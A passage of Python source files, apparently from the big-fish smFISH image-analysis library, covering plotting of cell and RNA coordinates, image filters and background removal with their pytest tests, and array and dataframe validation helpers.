rna_in_foci_coord[:, ndim - 2],
s=25, c="darkorange", marker=".")
# case where we only know the foci centroid
else:
ax[1].scatter(foci_coord[:, ndim - 1], foci_coord[:, ndim - 2],
s=40, c="darkorange", marker="o")
if other_coord is not None:
ax[1].scatter(other_coord[:, ndim - 1], other_coord[:, ndim - 2],
s=25, c="forestgreen", marker="D")
# titles and frames
_, _, min_y, max_y = ax[1].axis()
ax[1].set_ylim(max_y, min_y)
ax[1].use_sticky_edges = True
ax[1].margins(0.01, 0.01)
ax[1].axis('scaled')
if remove_frame:
ax[0].axis("off")
ax[1].axis("off")
if title is not None:
ax[0].set_title("Original image ({0})".format(title),
fontweight="bold", fontsize=10)
ax[1].set_title("Coordinate representation ({0})".format(title),
fontweight="bold", fontsize=10)
plt.tight_layout()
# output
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# plot coordinate representation only
elif cell_coord is not None and image is None:
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
# coordinate image
plt.plot(cell_coord[:, 1], cell_coord[:, 0], c="black", linewidth=2)
if nuc_coord is not None:
plt.plot(nuc_coord[:, 1], nuc_coord[:, 0],
c="steelblue", linewidth=2)
if rna_coord is not None:
plt.scatter(rna_coord[:, ndim - 1], rna_coord[:, ndim - 2],
s=25, c="firebrick", marker=".")
if foci_coord is not None:
for foci in foci_coord:
plt.text(foci[ndim-1] + 5, foci[ndim-2] - 5, str(foci[ndim]),
color="darkorange", size=20)
# case where we know which rna belong to a foci
if rna_coord.shape[1] == ndim + 1:
foci_indices = foci_coord[:, ndim + 1]
mask_rna_in_foci = np.isin(rna_coord[:, ndim], foci_indices)
rna_in_foci_coord = rna_coord[mask_rna_in_foci, :].copy()
plt.scatter(rna_in_foci_coord[:, ndim - 1],
rna_in_foci_coord[:, ndim - 2],
s=25, c="darkorange", marker=".")
# case where we only know the foci centroid
else:
plt.scatter(foci_coord[:, ndim - 1], foci_coord[:, ndim - 2],
s=40, c="darkorange", marker="o")
if other_coord is not None:
plt.scatter(other_coord[:, ndim - 1], other_coord[:, ndim - 2],
s=25, c="forestgreen", marker="D")
# titles and frames
_, _, min_y, max_y = plt.axis()
plt.ylim(max_y, min_y)
plt.use_sticky_edges = True
plt.margins(0.01, 0.01)
plt.axis('scaled')
if title is not None:
plt.title("Coordinate representation ({0})".format(title),
fontweight="bold", fontsize=10)
if not remove_frame:
plt.tight_layout()
# output
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# plot original image only
elif cell_coord is None and image is not None:
plot_segmentation_boundary(
image=image, cell_label=cell_mask, nuc_label=nuc_mask,
rescale=rescale, contrast=contrast, title=title,
framesize=framesize, remove_frame=remove_frame,
path_output=path_output, ext=ext, show=show)
```
#### File: bigfish/stack/filter.py
```python
import numpy as np
from .utils import check_array
from .utils import check_parameter
from .preprocess import cast_img_float32
from .preprocess import cast_img_float64
from .preprocess import cast_img_uint8
from .preprocess import cast_img_uint16
from skimage.morphology.selem import square
from skimage.morphology.selem import diamond
from skimage.morphology.selem import rectangle
from skimage.morphology.selem import disk
from skimage.morphology import binary_dilation
from skimage.morphology import dilation
from skimage.morphology import binary_erosion
from skimage.morphology import erosion
from skimage.filters import rank
from skimage.filters import gaussian
from scipy.ndimage import gaussian_laplace
from scipy.ndimage import convolve
# ### Filters ###
def _define_kernel(shape, size, dtype):
"""Build a kernel to apply a filter on images.
Parameters
----------
shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
size : int, Tuple(int) or List(int)
The size of the kernel:
- For the rectangle we expect two values (`height`, `width`).
- For the square one value (`width`).
- For the disk and the diamond one value (`radius`).
dtype : type
Dtype used for the kernel (the same as the image).
Returns
-------
kernel : skimage.morphology.selem object
Kernel to use with a skimage filter.
"""
# build the kernel
if shape == "diamond":
kernel = diamond(size, dtype=dtype)
elif shape == "disk":
kernel = disk(size, dtype=dtype)
elif shape == "rectangle" and isinstance(size, tuple):
kernel = rectangle(size[0], size[1], dtype=dtype)
elif shape == "square":
kernel = square(size, dtype=dtype)
else:
raise ValueError("Kernel definition is wrong. Shape of the kernel "
"should be 'diamond', 'disk', 'rectangle' or "
"'square'. Not {0}.".format(shape))
return kernel
def mean_filter(image, kernel_shape, kernel_size):
"""Apply a mean filter to a 2-d through convolution filter.
Parameters
----------
image : np.ndarray, np.uint or np.float
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.float32, np.float64, np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# build kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=np.float64)
n = kernel.sum()
kernel /= n
# apply convolution filter
image_filtered = convolve(image, kernel)
return image_filtered
def median_filter(image, kernel_shape, kernel_size):
"""Apply a median filter to a 2-d image.
Parameters
----------
image : np.ndarray, np.uint
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# get kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
image_filtered = rank.median(image, kernel)
return image_filtered
def maximum_filter(image, kernel_shape, kernel_size):
"""Apply a maximum filter to a 2-d image.
Parameters
----------
image : np.ndarray, np.uint
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# get kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
image_filtered = rank.maximum(image, kernel)
return image_filtered
def minimum_filter(image, kernel_shape, kernel_size):
"""Apply a minimum filter to a 2-d image.
Parameters
----------
image : np.ndarray, np.uint
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_filtered : np.ndarray, np.uint
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16])
check_parameter(kernel_shape=str,
kernel_size=(int, tuple, list))
# get kernel
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
image_filtered = rank.minimum(image, kernel)
return image_filtered
def log_filter(image, sigma):
"""Apply a Laplacian of Gaussian filter to a 2-d or 3-d image.
The function returns the inverse of the filtered image such that the pixels
with the highest intensity from the original (smoothed) image have
positive values. Those with a low intensity returning a negative value are
clipped to zero.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
sigma : float, int, Tuple(float, int) or List(float, int)
Sigma used for the gaussian filter (one for each dimension). If it's a
scalar, the same sigma is applied to every dimensions. Can be computed
with :func:`bigfish.stack.get_sigma`.
Returns
-------
image_filtered : np.ndarray
Filtered image.
"""
# check parameters
check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
check_parameter(sigma=(float, int, tuple, list))
# we cast the data in np.float to allow negative values
if image.dtype == np.uint8:
image_float = cast_img_float32(image)
elif image.dtype == np.uint16:
image_float = cast_img_float64(image)
else:
image_float = image
# check sigma
if isinstance(sigma, (tuple, list)):
if len(sigma) != image.ndim:
raise ValueError("'sigma' must be a scalar or a sequence with the "
"same length as 'image.ndim'.")
# we apply LoG filter
image_filtered = gaussian_laplace(image_float, sigma=sigma)
# as the LoG filter makes the peaks in the original image appear as a
# reversed mexican hat, we inverse the result and clip negative values to 0
image_filtered = np.clip(-image_filtered, a_min=0, a_max=None)
# cast filtered image
if image.dtype == np.uint8:
image_filtered = cast_img_uint8(image_filtered, catch_warning=True)
elif image.dtype == np.uint16:
image_filtered = cast_img_uint16(image_filtered, catch_warning=True)
else:
pass
return image_filtered
def gaussian_filter(image, sigma, allow_negative=False):
"""Apply a Gaussian filter to a 2-d or 3-d image.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
sigma : float, int, Tuple(float, int) or List(float, int)
Sigma used for the gaussian filter (one for each dimension). If it's a
scalar, the same sigma is applied to every dimensions. Can be computed
with :func:`bigfish.stack.get_sigma`.
allow_negative : bool
Allow negative values after the filtering or clip them to 0. Not
compatible with unsigned integer images.
Returns
-------
image_filtered : np.ndarray
Filtered image.
"""
# check parameters
check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
check_parameter(sigma=(float, int, tuple, list),
allow_negative=bool)
if image.dtype in [np.uint8, np.uint16] and allow_negative:
raise ValueError("Negative values are impossible with unsigned "
"integer image.")
# we cast the data in np.float to allow negative values
if image.dtype == np.uint8:
image_float = cast_img_float32(image)
elif image.dtype == np.uint16:
image_float = cast_img_float64(image)
else:
image_float = image
# we apply gaussian filter
image_filtered = gaussian(image_float, sigma=sigma)
# we clip negative values to 0
if not allow_negative:
image_filtered = np.clip(image_filtered, a_min=0, a_max=1)
# cast filtered image
if image.dtype == np.uint8:
image_filtered = cast_img_uint8(image_filtered, catch_warning=True)
elif image.dtype == np.uint16:
image_filtered = cast_img_uint16(image_filtered, catch_warning=True)
else:
pass
return image_filtered
def remove_background_mean(image, kernel_shape="disk", kernel_size=200):
"""Remove background noise from a 2-d image, subtracting a mean filtering.
Parameters
----------
image : np.ndarray, np.uint
Image to process with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`).
Returns
-------
image_without_back : np.ndarray, np.uint
Image processed.
"""
# compute background noise with a large mean filter
background = mean_filter(image,
kernel_shape=kernel_shape,
kernel_size=kernel_size)
# subtract the background from the original image, clipping negative
# values to 0
mask = image > background
image_without_back = np.subtract(image, background,
out=np.zeros_like(image),
where=mask)
return image_without_back
def remove_background_gaussian(image, sigma):
"""Remove background noise from a 2-d or 3-d image, subtracting a gaussian
filtering.
Parameters
----------
image : np.ndarray
Image to process with shape (z, y, x) or (y, x).
sigma : float, int, Tuple(float, int) or List(float, int)
Sigma used for the gaussian filter (one for each dimension). If it's a
scalar, the same sigma is applied to every dimensions. Can be computed
with :func:`bigfish.stack.get_sigma`.
Returns
-------
image_no_background : np.ndarray
Image processed with shape (z, y, x) or (y, x).
"""
# apply a gaussian filter
image_filtered = gaussian_filter(image, sigma,
allow_negative=False)
# subtract the gaussian filter
out = np.zeros_like(image)
image_no_background = np.subtract(image, image_filtered,
out=out,
where=(image > image_filtered),
dtype=image.dtype)
return image_no_background
def dilation_filter(image, kernel_shape=None, kernel_size=None):
"""Apply a dilation to a 2-d image.
Parameters
----------
image : np.ndarray
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`). If None, use cross-shaped structuring
element (``connectivity=1``).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`). If None, use cross-shaped structuring element
(``connectivity=1``).
Returns
-------
image_filtered : np.ndarray
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.float32, np.float64, bool])
check_parameter(kernel_shape=(str, type(None)),
kernel_size=(int, tuple, list, type(None)))
# get kernel
if kernel_shape is None or kernel_size is None:
kernel = None
else:
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
if image.dtype == bool:
image_filtered = binary_dilation(image, kernel)
else:
image_filtered = dilation(image, kernel)
return image_filtered
def erosion_filter(image, kernel_shape=None, kernel_size=None):
"""Apply an erosion to a 2-d image.
Parameters
----------
image : np.ndarray
Image with shape (y, x).
kernel_shape : str
Shape of the kernel used to compute the filter (`diamond`, `disk`,
`rectangle` or `square`). If None, use cross-shaped structuring
element (``connectivity=1``).
kernel_size : int, Tuple(int) or List(int)
The size of the kernel. For the rectangle we expect two integers
(`height`, `width`). If None, use cross-shaped structuring element
(``connectivity=1``).
Returns
-------
image_filtered : np.ndarray
Filtered 2-d image with shape (y, x).
"""
# check parameters
check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.float32, np.float64, bool])
check_parameter(kernel_shape=(str, type(None)),
kernel_size=(int, tuple, list, type(None)))
# get kernel
if kernel_shape is None or kernel_size is None:
kernel = None
else:
kernel = _define_kernel(shape=kernel_shape,
size=kernel_size,
dtype=image.dtype)
# apply filter
if image.dtype == bool:
image_filtered = binary_erosion(image, kernel)
else:
image_filtered = erosion(image, kernel)
return image_filtered
```
#### File: stack/tests/test_filter.py
```python
import pytest
import numpy as np
import bigfish.stack as stack
from bigfish.stack.filter import _define_kernel
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
# toy images
x = np.array(
[[3, 2, 0, 0, 0],
[2, 1, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 2, 1, 5, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
y = np.array(
[[0, 0, 62, 164, 55],
[0, 0, 120, 235, 181],
[0, 0, 73, 205, 0],
[0, 131, 0, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
@pytest.mark.parametrize("shape, size", [
("diamond", 3), ("disk", 3), ("rectangle", (2, 3)), ("square", 3),
("blabla", 3)])
@pytest.mark.parametrize("dtype", [
np.uint8, np.uint16, np.uint32, np.uint64,
np.int8, np.int16, np.int32, np.int64,
np.float16, np.float32, np.float64, bool])
def test_kernel(shape, size, dtype):
# non valid case
if shape not in ["diamond", "disk", "rectangle", "square"]:
with pytest.raises(ValueError):
_define_kernel(shape, size, dtype)
# valid cases
else:
kernel = _define_kernel(shape, size, dtype)
if shape == "diamond":
expected_kernel = np.array(
[[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]],
dtype=dtype)
elif shape == "disk":
expected_kernel = np.array(
[[0, 0, 0, 1, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 1, 0, 0, 0]],
dtype=dtype)
elif shape == "rectangle":
expected_kernel = np.array(
[[1, 1, 1],
[1, 1, 1]],
dtype=dtype)
else:
expected_kernel = np.array(
[[1, 1, 1],
[1, 1, 1],
[1, 1, 1]],
dtype=dtype)
assert_array_equal(kernel, expected_kernel)
assert kernel.dtype == dtype
def test_mean_filter():
# np.uint8
filtered_x = stack.mean_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[2, 1, 0, 0, 0],
[1, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.mean_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
# np.float32
filtered_x = stack.mean_filter(x.astype(np.float32),
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[2.333, 1.444, 0.556, 0., 0.],
[1.556, 1., 0.444, 0., 0.],
[0.889, 0.778, 1.111, 0.667, 0.556],
[0.333, 0.444, 1., 0.667, 0.556],
[0.222, 0.333, 0.889, 0.667, 0.556]],
dtype=np.float32)
assert_allclose(filtered_x, expected_x, rtol=1e-02)
assert filtered_x.dtype == np.float32
# np.float64
filtered_x = stack.mean_filter(x.astype(np.float64),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float64)
assert_allclose(filtered_x, expected_x, rtol=1e-02)
assert filtered_x.dtype == np.float64
def test_median_filter():
# np.uint8
filtered_x = stack.median_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[2, 2, 0, 0, 0],
[2, 1, 0, 0, 0],
[1, 1, 1, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.median_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_maximum_filter():
# np.uint8
filtered_x = stack.maximum_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[3, 3, 2, 0, 0],
[3, 3, 2, 0, 0],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.maximum_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_minimum_filter():
# np.uint8
filtered_x = stack.minimum_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[1, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.minimum_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_log_filter():
# float64
y_float64 = stack.cast_img_float64(y)
filtered_y_float64 = stack.log_filter(y_float64, 2)
expected_y_float64 = np.array(
[[0., 0., 0.02995949, 0.06212277, 0.07584532],
[0., 0., 0.02581818, 0.05134284, 0.06123539],
[0., 0., 0.01196859, 0.0253716, 0.02853162],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
dtype=np.float64)
assert_allclose(filtered_y_float64, expected_y_float64, rtol=1e-6)
assert filtered_y_float64.dtype == np.float64
# float32
y_float32 = stack.cast_img_float32(y)
filtered_y = stack.log_filter(y_float32, 2)
expected_y = stack.cast_img_float32(expected_y_float64)
assert_allclose(filtered_y, expected_y, rtol=1e-6)
assert filtered_y.dtype == np.float32
# uint8
filtered_y = stack.log_filter(y, 2)
expected_y = stack.cast_img_uint8(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint8
# uint16
y_uint16 = stack.cast_img_uint16(y)
filtered_y = stack.log_filter(y_uint16, 2)
expected_y = stack.cast_img_uint16(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint16
def test_gaussian_filter():
# float64
y_float64 = stack.cast_img_float64(y)
filtered_y_float64 = stack.gaussian_filter(y_float64, 2)
expected_y_float64 = np.array(
[[0.08928096, 0.1573019 , 0.22897881, 0.28086597, 0.3001061 ],
[0.08668051, 0.14896399, 0.21282558, 0.25752308, 0.27253406],
[0.07634613, 0.12664142, 0.17574502, 0.20765944, 0.2155001 ],
[0.05890843, 0.09356377, 0.12493327, 0.1427122 , 0.14374558],
[0.03878372, 0.05873308, 0.07492625, 0.08201409, 0.07939603]],
dtype=np.float64)
assert_allclose(filtered_y_float64, expected_y_float64, rtol=1e-6)
assert filtered_y_float64.dtype == np.float64
# float32
y_float32 = stack.cast_img_float32(y)
filtered_y = stack.gaussian_filter(y_float32, 2)
expected_y = stack.cast_img_float32(expected_y_float64)
assert_allclose(filtered_y, expected_y, rtol=1e-6)
assert filtered_y.dtype == np.float32
# uint8
with pytest.raises(ValueError):
stack.gaussian_filter(y, 2, allow_negative=True)
filtered_y = stack.gaussian_filter(y, 2)
expected_y = stack.cast_img_uint8(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint8
# uint16
y_uint16 = stack.cast_img_uint16(y)
with pytest.raises(ValueError):
stack.gaussian_filter(y_uint16, 2, allow_negative=True)
filtered_y = stack.gaussian_filter(y_uint16, 2)
expected_y = stack.cast_img_uint16(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint16
def test_background_removal_mean():
# np.uint8
filtered_x = stack.remove_background_mean(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[1, 1, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 2, 0, 5, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.remove_background_mean(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
def test_background_removal_gaussian():
# float64
y_float64 = stack.cast_img_float64(y)
filtered_y_float64 = stack.remove_background_gaussian(y_float64, 2)
expected_y_float64 = np.array(
[[0., 0., 0.01415845, 0.36227129, 0.],
[0., 0., 0.25776265, 0.66404555, 0.43726986],
[0., 0., 0.11052949, 0.59626213, 0.],
[0., 0.42016172, 0., 0., 0.],
[0., 0., 0., 0., 0.]],
dtype=np.float64)
assert_allclose(filtered_y_float64, expected_y_float64, rtol=1e-6)
assert filtered_y_float64.dtype == np.float64
# float32
y_float32 = stack.cast_img_float32(y)
filtered_y = stack.remove_background_gaussian(y_float32, 2)
expected_y = stack.cast_img_float32(expected_y_float64)
assert_allclose(filtered_y, expected_y, rtol=1e-6)
assert filtered_y.dtype == np.float32
# uint8
with pytest.raises(ValueError):
stack.gaussian_filter(y, 2, allow_negative=True)
filtered_y = stack.remove_background_gaussian(y, 2)
expected_y = stack.cast_img_uint8(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint8
# uint16
y_uint16 = stack.cast_img_uint16(y)
with pytest.raises(ValueError):
stack.gaussian_filter(y_uint16, 2, allow_negative=True)
filtered_y = stack.remove_background_gaussian(y_uint16, 2)
expected_y = stack.cast_img_uint16(expected_y_float64)
assert_array_equal(filtered_y, expected_y)
assert filtered_y.dtype == np.uint16
def test_dilation_filter():
# np.uint8
filtered_x = stack.dilation_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[3, 3, 2, 0, 0],
[3, 3, 2, 0, 0],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5],
[2, 2, 5, 5, 5]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.dilation_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
# np.float32
filtered_x = stack.dilation_filter(x.astype(np.float32),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float32)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float32
# np.float64
filtered_x = stack.dilation_filter(x.astype(np.float64),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float64)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float64
# bool
filtered_x = stack.dilation_filter(x.astype(bool),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(bool)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == bool
def test_erosion_filter():
# np.uint8
filtered_x = stack.erosion_filter(x,
kernel_shape="square",
kernel_size=3)
expected_x = np.array(
[[1, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]],
dtype=np.uint8)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint8
# np.uint16
filtered_x = stack.erosion_filter(x.astype(np.uint16),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.uint16)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.uint16
# np.float32
filtered_x = stack.erosion_filter(x.astype(np.float32),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float32)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float32
# np.float64
filtered_x = stack.erosion_filter(x.astype(np.float64),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(np.float64)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == np.float64
# bool
filtered_x = stack.erosion_filter(x.astype(bool),
kernel_shape="square",
kernel_size=3)
expected_x = expected_x.astype(bool)
assert_array_equal(filtered_x, expected_x)
assert filtered_x.dtype == bool
```
#### File: bigfish/stack/utils.py
```python
import os
import re
import copy
import inspect
import hashlib
import numpy as np
import pandas as pd
from urllib.request import urlretrieve
# ### Sanity checks dataframe ###
def check_df(df, features=None, features_without_nan=None):
"""Full safety check of a dataframe.
Parameters
----------
df : pd.DataFrame or pd.Series
Dataframe or Series to check.
features : List[str]
Names of the expected features.
features_without_nan : List[str]
Names of the features to check for the missing values
Returns
-------
_ : bool
Assert if the dataframe is well formatted.
"""
# check parameters
check_parameter(df=(pd.DataFrame, pd.Series),
features=(list, type(None)),
features_without_nan=(list, type(None)))
# check features
if features is not None:
_check_features_df(df, features)
# check NaN values
if features_without_nan is not None:
_check_features_df(df, features_without_nan)
_check_nan_df(df, features_without_nan)
return True
def _check_features_df(df, features):
"""Check that the dataframe contains expected features.
Parameters
----------
df : pd.DataFrame
Dataframe to check.
features : List[str]
Names of the expected features.
"""
# check columns
if not set(features).issubset(df.columns):
raise ValueError("The dataframe does not seem to have the right "
"features. {0} instead of {1}"
.format(list(df.columns.values), features))
def _check_nan_df(df, features_to_check=None):
"""Check specific columns of the dataframe do not have any missing values.
Parameters
----------
df : pd.DataFrame
Dataframe to check.
features_to_check : List[str]
Names of the checked features.
"""
# count NaN
nan_count = df.isnull().sum()
# for the full dataframe...
if features_to_check is None:
x = nan_count.sum()
if x > 0:
raise ValueError("The dataframe has {0} NaN values.".format(x))
# ...or for some features
else:
nan_count = nan_count[features_to_check]
x = nan_count.sum()
if x > 0:
raise ValueError("The dataframe has {0} NaN values for the "
"requested features: \n{1}.".format(x, nan_count))
# ### Sanity checks array ###
def check_array(array, ndim=None, dtype=None, allow_nan=True):
"""Full safety check of an array.
Parameters
----------
array : np.ndarray
Array to check.
ndim : int or List[int]
Number of dimensions expected.
dtype : type or List[type]
Types expected.
allow_nan : bool
Allow NaN values or not.
Returns
-------
_ : bool
Assert if the array is well formatted.
"""
# check parameters
check_parameter(array=np.ndarray,
ndim=(int, list, type(None)),
dtype=(type, list, type(None)),
allow_nan=bool)
# check the dtype
if dtype is not None:
_check_dtype_array(array, dtype)
# check the number of dimension
if ndim is not None:
_check_dim_array(array, ndim)
# check NaN
if not allow_nan:
_check_nan_array(array)
return True
def _check_dtype_array(array, dtype):
"""Check that a np.ndarray has the right dtype.
Parameters
----------
array : np.ndarray
Array to check
dtype : type or List[type]
Type expected.
"""
# enlist the dtype expected
if isinstance(dtype, type):
dtype = [dtype]
# TODO simplify
# check the dtype of the array
error = True
for dtype_expected in dtype:
if array.dtype == dtype_expected:
error = False
break
if error:
raise TypeError("{0} is not supported yet. Use one of those dtypes "
"instead: {1}.".format(array.dtype, dtype))
def _check_dim_array(array, ndim):
"""Check that the array has the right number of dimensions.
Parameters
----------
array : np.ndarray
Array to check.
ndim : int or List[int]
Number of dimensions expected
"""
# enlist the number of expected dimensions
if isinstance(ndim, int):
ndim = [ndim]
# check the number of dimensions of the array
if array.ndim not in ndim:
raise ValueError("Array can't have {0} dimension(s). Expected "
"dimensions are: {1}.".format(array.ndim, ndim))
def _check_nan_array(array):
"""Check that the array does not have missing values.
Parameters
----------
array : np.ndarray
Array to check.
"""
# count nan
mask = np.isnan(array)
x = mask.sum()
# check the NaN values of the array
if x > 0:
raise ValueError("Array has {0} NaN values.".format(x))
def check_range_value(array, min_=None, max_=None):
"""Check the support of the array.
Parameters
----------
array : np.ndarray
Array to check.
min_ : int
Minimum value allowed.
max_ : int
Maximum value allowed.
Returns
-------
_ : bool
Assert if the array has the right range of values.
"""
# check lowest and highest bounds
if min_ is not None and array.min() < min_:
raise ValueError("The array should have a lower bound of {0}, but its "
"minimum value is {1}.".format(min_, array.min()))
if max_ is not None and array.max() > max_:
raise ValueError("The array should have an upper bound of {0}, but "
"its maximum value is {1}.".format(max_, array.max()))
return True
